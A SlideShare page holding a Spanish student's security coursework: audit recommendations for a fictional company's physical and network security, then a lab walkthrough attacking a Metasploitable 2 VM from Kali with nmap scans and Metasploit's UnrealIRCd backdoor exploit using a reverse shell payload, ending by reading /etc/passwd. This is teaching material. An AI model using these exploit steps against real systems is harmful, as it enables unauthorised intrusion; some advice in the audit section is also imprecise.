SlideShare una empresa de Scribd logo

Proyecto 1 SEIN - Patricia Durán

P
PatriD

Seguridad informática. Proyecto nº 1

Educación
1 de 12
Proyecto en el que se incluyen tanto la descripción de medidas aplicables de seguridad en diversos casos como un ataque desde una máquina kali-linux a una máquina con metasplotaible para atacarla. Proyecto 1. Conceptos Seguridad informática Patricia Durán de Jesús
ÍNDICE 1. MEDIDAS DE SEGURIDAD PASIVA......................................................................1 2. ASEGURAR LA PRIVACIDAD ............................................................................3 3. DEMOSTRACIÓN VULNERABILIDADES ................................................................4
Seguridad informática 2017-2018 Patricia Durán de Jesús 1 1. MEDIDAS DE SEGURIDAD PASIVA Aplicar medidas de seguridad pasiva en sistemas informáticos describiendo características de entornos y relacionándolas con sus necesidades.  Trabajas en una auditoría de seguridad informática. Llega un nuevo cliente que desea conocer la situación de su empresa en cuanto a seguridad informática y si es aceptable o podría mejorar. Durante la entrevista tomas las siguientes notas:  El edificio tiene un servicio de vigilancia a través de una empresa externa. Por reducción del presupuesto, ahora solo hay un vigilante que también atiende el edificio del otro lado de la calle. → Se necesita mayor seguridad. No se puede tener a un único vigilante y que encima debe estar vigilando dos edificios ya que la vigilancia no es igual de fiable y constante.  El CPD tiene otro vigilante, de otra compañía, que también atiende el teléfono de la centralita a partir de las 3, cuando termina el turno del recepcionista. → El centro de protección de datos debe estar bien protegido, no puede haber un vigilante que tenga 2 cargos más porque no presta la atención suficiente y al distraerse pueden haber posibles robos o alteraciones.  Para entrar al CPD, cada informático tiene una tarjeta particular, si bien hay una en el cajón de la mesa del vigilante para el personal de limpieza o por si ocurre una emergencia. → Cada tarjeta debe ser intransferible y no pueden tener acceso a cada tarjeta particular distintas personas al propietario de la misma. Además de que cada informático no debe tener acceso al CPD, solo los encargados del mismo.  Una vez a la semana se hace la copia de seguridad. Como solo disponen de un dispositivo de cinta, los cuatro servidores se reparten cada semana del mes. Dado que solo hay un vigilante para el CPD, las cintas se dejan dentro de la sala, cada una encima de su servidor (cada servidor tiene una cinta en exclusiva). → Las copias deben ser instantáneas ya que en el momento en que se hacen cambios, añaden o quitan cosas se pueden perder datos. Las cintas no pueden estar a plena vista y mucho menos encima de cada servidor, si alguien entrase a robar los datos, l tendría muy fácil ya que solo hay un vigilante. Se tiene que poner mayor vigilancia, realizar copias de seguridad
Seguridad informática 2017-2018 Patricia Durán de Jesús 2 instantáneas, mejorar el método de las copias y guardarlas en un lugar seguro que no esté a la vista de cualquiera.  El edificio pertenece al patrimonio histórico y no admite reformas en la fachada. Por tanto, no ha sido posible instalar equipos de aire acondicionado en el CPD. Para combatir el calor que desprenden los ordenadores, las ventanas están siempre abiertas. Cada servidor tiene un disco duro de alta gama, que no ha fallado nunca. → Se necesita refrigeración, las ventanas no pueden estar abiertas, entran suciedad y polvo constantemente y eso genera más calor en los equipos, se debe instalar refrigeración y en caso de que no puedan por no admitir reformas, se deberá cambiar el CPD a otro edificio que si permita realizar los cambios necesarios.  Los servidores tienen doble fuente de alimentación, por si se estropea alguna. → Está bien e incluso deberían haber Sistemas de Alimentación Ininterrumpida.  El presidente y el contable tienen cada uno un portátil de la empresa. El disco duro de estas máquinas no está cifrado porque no se arriesgan al desastre que supondría olvidar la contraseña. → Cifrar el disco duro y cada equipo protegerlo con una contraseña bien elaborada, sin datos personales o relacionados con el trabajo o empresa.  Los ordenadores tienen dos usuarios: uno para las tareas normales y otro cuando necesitan realizar alguna instalación o modificar un parámetro del sistema operativo. Los empleados saben cuándo deben usar cada uno. → Los empleados no deben tener acceso a instalaciones o modificaciones de parámetros del sistema operativo. Eso puede ocasionar problemas, ya que pueden configurar o borrar algo que no deben o incluso instalar malware sin darse cuenta y crea vulnerabilidades. Los empleados deben tener un usuario en el que tengan permisos limitados.  Termináis por hoy la entrevista porque ha sido una reunión muy larga. Todavía no has redactado el informe final, pero ¿encuentras algo que mejorar? ¿Qué alternativa le puedes proponer? Cambiar la seguridad y forma de actuar de la empresa con lo ya indicado en los apartados anteriores. Modificaría los niveles de seguridad, copias de seguridad realizadas, etc.
Seguridad informática 2017-2018 Patricia Durán de Jesús 3 2. ASEGURAR LA PRIVACIDAD Asegurar la privacidad de la información transmitida en redes informáticas describiendo vulnerabilidades e instalando software específico.  Al día siguiente continúa la entrevista: Tus nuevas notas son:  Hay una red wifi en la oficina que permite entrar en la red de ordenadores y salir a Internet. No tiene contraseña para que los clientes puedan utilizarla con total comodidad. → Deben de poner una contraseña, ya que no tenerla no hace que sea más cómodo si no que permite a personas externas a la empresa que puedan acceder sin ningún tipo de complejidad. Al menos teniendo contraseñas y diferenciando bien la red pública de la red privada de la empresa evitas posibles intrusos.  La mayoría de los ordenadores utilizan Windows XP, pero algunos empleados necesitan Windows 7, 8 o incluso 10 para correr ciertas aplicaciones. Como la empresa no puede afrontar la compra de nuevas licencias, están utilizando software pirata. → La empresa debe asumir el precio de unas licencias de Windows 10, por ejemplo, ya que es el más actual y tiene soporte técnico mientras que Windows XP ya no. En caso de no poder asumir el precio, podrían pasar a un software libre.  En cuanto al antivirus, cada empleado pone el que más le gusta y se los pasan entre ellos mediante dispositivos USB. → Se debería tener un mismo antivirus para todos los equipos y estar terminantemente prohibido el uso de USB ajenos o propios de los trabajadores, ya que existe el riesgo de que ese USB esté infectado con malware e infectase a toda la empresa.  Los ordenadores que hacen de servidores tienen activadas las actualizaciones automáticas de todas las aplicaciones y el sistema operativo, pero en los ordenadores de empleados no se hace porque han visto que se satura la conexión a Internet. → Se deben actualizar siempre que sea necesario ya que en las actualizaciones existen modificaciones del software que quizá implementen mayor seguridad o arreglen fallos que puedan ocasionar un agujero de seguridad en un futuro lejano, o incluso cercano.  La mayoría de los equipos de red son switch y routers, pero algunos despachos todavía tienen hubs porque son fiables y el ancho de banda es suficiente. → Los hubs generan mucho tráfico y consumen más
Seguridad informática 2017-2018 Patricia Durán de Jesús 4 ancho de banda, aunque son más rápidos, no son tan fiables como pueden ser un switch o un router-  Para entrar a la red desde Internet utilizan Hamachi, un servicio gratuito y muy sencillo de instalar. → Hamachi tiene como desventajas los problemas con los enrutadores, ya que se generan conflictos. Otra opción para tener una red privada sería OpenVPN.  El servidor web está instalado sobre una máquina con sistema operativo Linux Ubuntu Server 9.04. → Cambiar la versión de Linux Ubuntu Server a una más actualizada para mantenernos al día en actualizaciones tanto a nivel de seguridad como software en general. Últimas versiones: Ubuntu Server 16.04.3 LTS y Ubuntu Server 17.04 3. DEMOSTRACIÓN VULNERABILIDADES Completar el informe con una demo en la que le harás ver al cliente cómo se pueden aprovechar las vulnerabilidades de sus sistemas. Para ello vas a realizar la práctica de INCIBE “Explotando un sistema” perteneciente al capítulo “Fundamentos del análisis de sistemas”, siguiendo el correspondiente vídeo-tutorial de YouTube. Vas a necesitar dos máquinas virtuales, una con kali-linux (máquina atacante) y la otra con metasploitable 2 (máquina vulnerable). Primero comprobaremos la visibilidad entre las máquinas, tanto con kali-linux como con la máquina vulnerable, la metasploitable. Podemos comprobar que la IP de la máquina vulnerable es 192.168.1.165 y la máquina atacante 192.168.1.166
Seguridad informática 2017-2018 Patricia Durán de Jesús 5 Para comprobar la visibilidad entre ambas, haremos ping desde la máquina atacante a la máquina vulnerable: - Ping 192.168.1.165 Utilizaremos Nmap para escanear la IP de la red (192.168.1.0) para encontrar los equipos encendidos en la red.
Seguridad informática 2017-2018 Patricia Durán de Jesús 6 Procederemos a escanear los puertos de nuestra máquina con nmap –sT –O 192.168.1.166 (IP de la máquina atacada) Lo siguiente que haremos será: Nmap –sT –sV (IP de la máquina vulnerable, atacada)
Seguridad informática 2017-2018 Patricia Durán de Jesús 7 El siguiente paso a realizar será “telnet (IP del objetivo) (Puerto de telnet). Una vez hecho, podremos poner herramientas como FTP o SSH. El procedimiento es abrir la consola e introducir los comandos: - ftp <dirección IP> - telnet <dirección IP> - ssh <dirección IP>
Seguridad informática 2017-2018 Patricia Durán de Jesús 8
Seguridad informática 2017-2018 Patricia Durán de Jesús 9 Abriremos una consola del sistema e introduciremos estos comandos: Msfconsole Use exploit/unit/irc/unreal_ircd_3281_backdoor Set RHOST <IP> Set payload <payload> (cmd/unix/reverse) Set LHOST <IP> Exploit
Seguridad informática 2017-2018 Patricia Durán de Jesús 10 Por ultimo abriremos una consola del Sistema e introduciremos este comando: Is Cat etc/psswd

Recomendados

El alcance de la seguridad informática al HOME OFFICE
El alcance de la seguridad informática al HOME OFFICEEl alcance de la seguridad informática al HOME OFFICE
El alcance de la seguridad informática al HOME OFFICEDanya Carrera
 
Proyecto 6.docx
Proyecto 6.docxProyecto 6.docx
Proyecto 6.docx1smr07
 
Pautas técnicas para estar protegido ante cualquier ataque cibernético
Pautas técnicas para estar protegido ante cualquier ataque cibernéticoPautas técnicas para estar protegido ante cualquier ataque cibernético
Pautas técnicas para estar protegido ante cualquier ataque cibernéticoF.c. Incomprendido Anntony
 
Seguridad 2
Seguridad 2Seguridad 2
Seguridad 2cesar
 
Segunda evaluación
Segunda evaluaciónSegunda evaluación
Segunda evaluaciónCarmenechevarria4a
 
42 seguridad y autenticación
42 seguridad y autenticación42 seguridad y autenticación
42 seguridad y autenticaciónAprende Viendo
 
Un completo analisis para crear un sistema de seguridad en redes LAN
Un completo analisis para crear un sistema de seguridad en redes LANUn completo analisis para crear un sistema de seguridad en redes LAN
Un completo analisis para crear un sistema de seguridad en redes LANjsebastianrod
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 

Recomendados

El alcance de la seguridad informática al HOME OFFICE
El alcance de la seguridad informática al HOME OFFICEEl alcance de la seguridad informática al HOME OFFICE
El alcance de la seguridad informática al HOME OFFICEDanya Carrera
 
Proyecto 6.docx
Proyecto 6.docxProyecto 6.docx
Proyecto 6.docx1smr07
 
Pautas técnicas para estar protegido ante cualquier ataque cibernético
Pautas técnicas para estar protegido ante cualquier ataque cibernéticoPautas técnicas para estar protegido ante cualquier ataque cibernético
Pautas técnicas para estar protegido ante cualquier ataque cibernéticoF.c. Incomprendido Anntony
 
Seguridad 2
Seguridad 2Seguridad 2
Seguridad 2cesar
 
Segunda evaluación
Segunda evaluaciónSegunda evaluación
Segunda evaluaciónCarmenechevarria4a
 
42 seguridad y autenticación
42 seguridad y autenticación42 seguridad y autenticación
42 seguridad y autenticaciónAprende Viendo
 
Un completo analisis para crear un sistema de seguridad en redes LAN
Un completo analisis para crear un sistema de seguridad en redes LANUn completo analisis para crear un sistema de seguridad en redes LAN
Un completo analisis para crear un sistema de seguridad en redes LANjsebastianrod
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaGisela Ab
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1Miguel Ángel Marchal Barrera
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaAdixs Cabrejos
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad PerimetralJosé Moreno
 
44 seguridad y se linux
44 seguridad y se linux44 seguridad y se linux
44 seguridad y se linuxAprende Viendo
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMJosé Moreno
 
Plan de seguridad de computo
Plan de seguridad de computoPlan de seguridad de computo
Plan de seguridad de computochuchop
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaRouz Bautista
 
Seguridad para los datos de las pymes
Seguridad para los datos de las pymesSeguridad para los datos de las pymes
Seguridad para los datos de las pymesAlfredo Vela Zancada
 
Seguridad de acceso remoto
Seguridad de acceso remotoSeguridad de acceso remoto
Seguridad de acceso remotoGwenWake
 
Articulo.seguridad
Articulo.seguridadArticulo.seguridad
Articulo.seguridadDavid Antonio Cruz Naira
 
Politicas de seguridad
Politicas de seguridadPoliticas de seguridad
Politicas de seguridadAriel Brigido Lopez Villegas
 
Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.GwenWake
 
el hacker y el cracker
el hacker y el crackerel hacker y el cracker
el hacker y el crackerisabelit
 
Http
HttpHttp
HttpMarcelo A. Sánchez
 
6
66
6neburogeid
 
Plan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadoresPlan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadoresjavisc04
 
Tarea 6
Tarea 6Tarea 6
Tarea 6geovanny17
 
Seguridad en la_red
Seguridad en la_redSeguridad en la_red
Seguridad en la_redelenacediel
 
Proyecto1 SEIN
Proyecto1 SEINProyecto1 SEIN
Proyecto1 SEINPatriD
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1LauraSLeon
 

Más contenido relacionado

La actualidad más candente

Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaGisela Ab
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad PerimetralJosé Moreno
 
44 seguridad y se linux
44 seguridad y se linux44 seguridad y se linux
44 seguridad y se linuxAprende Viendo
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMJosé Moreno
 
Plan de seguridad de computo
Plan de seguridad de computoPlan de seguridad de computo
Plan de seguridad de computochuchop
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaRouz Bautista
 
Seguridad para los datos de las pymes
Seguridad para los datos de las pymesSeguridad para los datos de las pymes
Seguridad para los datos de las pymesAlfredo Vela Zancada
 
Seguridad de acceso remoto
Seguridad de acceso remotoSeguridad de acceso remoto
Seguridad de acceso remotoGwenWake
 
Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.GwenWake
 
el hacker y el cracker
el hacker y el crackerel hacker y el cracker
el hacker y el crackerisabelit
 
Plan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadoresPlan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadoresjavisc04
 
Seguridad en la_red
Seguridad en la_redSeguridad en la_red
Seguridad en la_redelenacediel
 

La actualidad más candente (20)

Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
 
44 seguridad y se linux
44 seguridad y se linux44 seguridad y se linux
44 seguridad y se linux
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIM
 
Plan de seguridad de computo
Plan de seguridad de computoPlan de seguridad de computo
Plan de seguridad de computo
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad para los datos de las pymes
Seguridad para los datos de las pymesSeguridad para los datos de las pymes
Seguridad para los datos de las pymes
 
Seguridad de acceso remoto
Seguridad de acceso remotoSeguridad de acceso remoto
Seguridad de acceso remoto
 
Articulo.seguridad
Articulo.seguridadArticulo.seguridad
Articulo.seguridad
 
Politicas de seguridad
Politicas de seguridadPoliticas de seguridad
Politicas de seguridad
 
Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.Plan de contingencia para la empresa atoland S.A.
Plan de contingencia para la empresa atoland S.A.
 
el hacker y el cracker
el hacker y el crackerel hacker y el cracker
el hacker y el cracker
 
Http
HttpHttp
Http
 
6
66
6
 
Plan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadoresPlan de seguridad para red de ordenadores
Plan de seguridad para red de ordenadores
 
Tarea 6
Tarea 6Tarea 6
Tarea 6
 
Seguridad en la_red
Seguridad en la_redSeguridad en la_red
Seguridad en la_red
 

Similar a Proyecto 1 SEIN - Patricia Durán

Proyecto1 SEIN
Proyecto1 SEINProyecto1 SEIN
Proyecto1 SEINPatriD
 
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSPROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSJenny Johanna
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud ComputingRobal96
 
Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01pattala01
 
Seguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallSeguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallVanesa Rodríguez Percy
 
Proyecto final
Proyecto finalProyecto final
Proyecto final1smr07
 
Actividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionActividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionALBAREBAQUE
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojassneiderr
 
Diseño Movistar
Diseño MovistarDiseño Movistar
Diseño MovistarUPS
 
Apuntes de seguridad informatica (personal en pc-internet)
Apuntes de seguridad informatica (personal en pc-internet)Apuntes de seguridad informatica (personal en pc-internet)
Apuntes de seguridad informatica (personal en pc-internet)Hector Bazarte
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasArturo Hoffstadt
 

Similar a Proyecto 1 SEIN - Patricia Durán (20)

Proyecto1 SEIN
Proyecto1 SEINProyecto1 SEIN
Proyecto1 SEIN
 
Proyecto 1
Proyecto 1Proyecto 1
Proyecto 1
 
Proyecto 1 - Conceptos
Proyecto 1 - ConceptosProyecto 1 - Conceptos
Proyecto 1 - Conceptos
 
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOSPROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
PROYECTO REDES Y SEGURIDAD SENA MANUAL DE PROCEDIMIENTOS
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud Computing
 
Proyecto1
Proyecto1Proyecto1
Proyecto1
 
3° corte
3° corte3° corte
3° corte
 
Seguridad física en la empresa
Seguridad física en la empresaSeguridad física en la empresa
Seguridad física en la empresa
 
Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01Actividadno1seguridadperimetral -conversion-gate01
Actividadno1seguridadperimetral -conversion-gate01
 
Seguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik FirewallSeguridad perimetral - Mikrotik Firewall
Seguridad perimetral - Mikrotik Firewall
 
Proyecto final
Proyecto finalProyecto final
Proyecto final
 
Seguridad en linux
Seguridad en linuxSeguridad en linux
Seguridad en linux
 
Actividades informatica 2ª Evaluacion
Actividades informatica 2ª EvaluacionActividades informatica 2ª Evaluacion
Actividades informatica 2ª Evaluacion
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojas
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Taller firewall
Taller firewallTaller firewall
Taller firewall
 
Diseño Movistar
Diseño MovistarDiseño Movistar
Diseño Movistar
 
Apuntes de seguridad informatica (personal en pc-internet)
Apuntes de seguridad informatica (personal en pc-internet)Apuntes de seguridad informatica (personal en pc-internet)
Apuntes de seguridad informatica (personal en pc-internet)
 
Apuntes
ApuntesApuntes
Apuntes
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de Sistemas
 

Último

EXPECTATIVAS vs PERSPECTIVA en la vida.
EXPECTATIVAS vs PERSPECTIVA en la vida.EXPECTATIVAS vs PERSPECTIVA en la vida.
EXPECTATIVAS vs PERSPECTIVA en la vida.DaluiMonasterio
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfManuel Molina
 
Cuadernillo de las sílabas trabadas.pdf
Cuadernillo de las sílabas trabadas.pdfCuadernillo de las sílabas trabadas.pdf
Cuadernillo de las sílabas trabadas.pdfBrandonsanchezdoming
 
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxPPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxOscarEduardoSanchezC
 
Análisis de la Implementación de los Servicios Locales de Educación Pública p...
Análisis de la Implementación de los Servicios Locales de Educación Pública p...Análisis de la Implementación de los Servicios Locales de Educación Pública p...
Análisis de la Implementación de los Servicios Locales de Educación Pública p...Baker Publishing Company
 
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfTarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfCarol Andrea Eraso Guerrero
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.José Luis Palma
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxYeseniaRivera50
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxAna Fernandez
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALEDUCCUniversidadCatl
 
Introducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleIntroducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleJonathanCovena1
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPELaura Chacón
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosCesarFernandez937857
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADOJosé Luis Palma
 
plan-de-trabajo-colegiado en una institucion educativa
plan-de-trabajo-colegiado en una institucion educativaplan-de-trabajo-colegiado en una institucion educativa
plan-de-trabajo-colegiado en una institucion educativafiorelachuctaya2
 
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxSINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxlclcarmen
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxdanalikcruz2000
 

Último (20)

EXPECTATIVAS vs PERSPECTIVA en la vida.
EXPECTATIVAS vs PERSPECTIVA en la vida.EXPECTATIVAS vs PERSPECTIVA en la vida.
EXPECTATIVAS vs PERSPECTIVA en la vida.
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
 
Cuadernillo de las sílabas trabadas.pdf
Cuadernillo de las sílabas trabadas.pdfCuadernillo de las sílabas trabadas.pdf
Cuadernillo de las sílabas trabadas.pdf
 
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxPPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
 
Análisis de la Implementación de los Servicios Locales de Educación Pública p...
Análisis de la Implementación de los Servicios Locales de Educación Pública p...Análisis de la Implementación de los Servicios Locales de Educación Pública p...
Análisis de la Implementación de los Servicios Locales de Educación Pública p...
 
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdfTarea 5-Selección de herramientas digitales-Carol Eraso.pdf
Tarea 5-Selección de herramientas digitales-Carol Eraso.pdf
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
 
Unidad 3 | Teorías de la Comunicación | MCDI
Unidad 3 | Teorías de la Comunicación | MCDIUnidad 3 | Teorías de la Comunicación | MCDI
Unidad 3 | Teorías de la Comunicación | MCDI
 
RETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docxRETO MES DE ABRIL .............................docx
RETO MES DE ABRIL .............................docx
 
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMALVOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
VOLUMEN 1 COLECCION PRODUCCION BOVINA . SERIE SANIDAD ANIMAL
 
Introducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo SostenibleIntroducción:Los objetivos de Desarrollo Sostenible
Introducción:Los objetivos de Desarrollo Sostenible
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPE
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos Básicos
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
 
plan-de-trabajo-colegiado en una institucion educativa
plan-de-trabajo-colegiado en una institucion educativaplan-de-trabajo-colegiado en una institucion educativa
plan-de-trabajo-colegiado en una institucion educativa
 
Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.Defendamos la verdad. La defensa es importante.
Defendamos la verdad. La defensa es importante.
 
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxSINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
 

Proyecto 1 SEIN - Patricia Durán

  • 1. Proyecto en el que se incluyen tanto la descripción de medidas aplicables de seguridad en diversos casos como un ataque desde una máquina kali-linux a una máquina con metasplotaible para atacarla. Proyecto 1. Conceptos Seguridad informática Patricia Durán de Jesús
